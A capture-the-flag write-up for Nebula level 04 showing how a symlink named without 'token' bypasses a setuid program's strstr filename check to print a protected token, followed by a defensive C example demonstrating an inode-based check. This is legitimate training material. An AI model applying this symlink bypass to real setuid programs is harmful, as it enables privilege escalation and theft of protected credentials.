Bypassed restriction
Nebula 04 Agenda: “This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)”

A review of the code shows that strstr is used to check that the filename passed as input does not contain the substring “token”; if it does, the program exits with an “EXIT_FAILURE” status. The check looks only at the name we supply, not at the file that is eventually opened. Since we have no permission to rename, copy or move the token, we bypass the restriction with a symbolic link (ln -s) whose name does not contain “token”.
1 level04@nebula:~$ cd /home/flag04
2 level04@nebula:/home/flag04$ ls -la
3 total 13
4 drwxr-x--- 2 flag04 level04 93 2011-11-20 21:52 .
5 drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
6 -rw-r--r-- 1 flag04 flag04 220 2011-05-18 02:54 .bash_logout
7 -rw-r--r-- 1 flag04 flag04 3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
9 -rw-r--r-- 1 flag04 flag04 675 2011-05-18 02:54 .profile
10 -rw------- 1 flag04 flag04 37 2011-11-20 21:52 token
11
12 level04@nebula:/home/flag04$ mkdir /tmp/level04
13 level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04/flag
14 level04@nebula:/home/flag04$ ./flag04 /tmp/level04/flag
15
16 06508b5e-8909-4f38-b630-fdb148a848a2
Finally, we can use the value printed at line 16 as the passphrase for the “flag04” user. After obtaining access you should know what to do =)
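The strstr check described above, next to a check made on the opened file itself. This is an added example, not the level's source code: the inode comparison, the function names and the sandbox under /tmp are assumptions for illustration, and it goes beyond the symlink case by also covering hard links.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The check as the write-up describes it: only the path string is inspected. */
int name_check_allows(const char *path) {
    return strstr(path, "token") == NULL;
}

/* Assumed alternative: decide on the object that was opened. Comparing device
 * and inode with the protected file catches symlinks and hard links alike. */
int object_check_allows(const char *path, const char *protected_path) {
    struct stat want, got;
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    if (fd < 0) return 0;                       /* cannot open: deny */
    int ok = stat(protected_path, &want) == 0 && fstat(fd, &got) == 0 &&
             !(want.st_dev == got.st_dev && want.st_ino == got.st_ino);
    close(fd);
    return ok;
}

/* Write a small constructed file; returns 0 on success. */
static int put(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Constructed sandbox: <dir>/token, <dir>/flag -> token, <dir>/notes. */
struct sandbox { char token[128], link[128], notes[128]; };

int make_sandbox(struct sandbox *s) {
    char dir[] = "/tmp/level04-demo-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    snprintf(s->token, sizeof s->token, "%s/token", dir);
    snprintf(s->link, sizeof s->link, "%s/flag", dir);
    snprintf(s->notes, sizeof s->notes, "%s/notes", dir);
    if (put(s->token, "constructed-secret\n") || put(s->notes, "public\n")) return -1;
    return symlink(s->token, s->link);
}

int main(void) {
    struct sandbox s;
    if (make_sandbox(&s) != 0) return 1;
    printf("name check, symlink:   %d\n", name_check_allows(s.link));
    printf("object check, symlink: %d\n", object_check_allows(s.link, s.token));
    printf("object check, notes:   %d\n", object_check_allows(s.notes, s.token));
    return 0;
}
```

In a setuid program the more common fix is to open the file with the caller's real uid, so that the kernel's own permission check decides; the inode comparison is used here because it can be demonstrated without a second account.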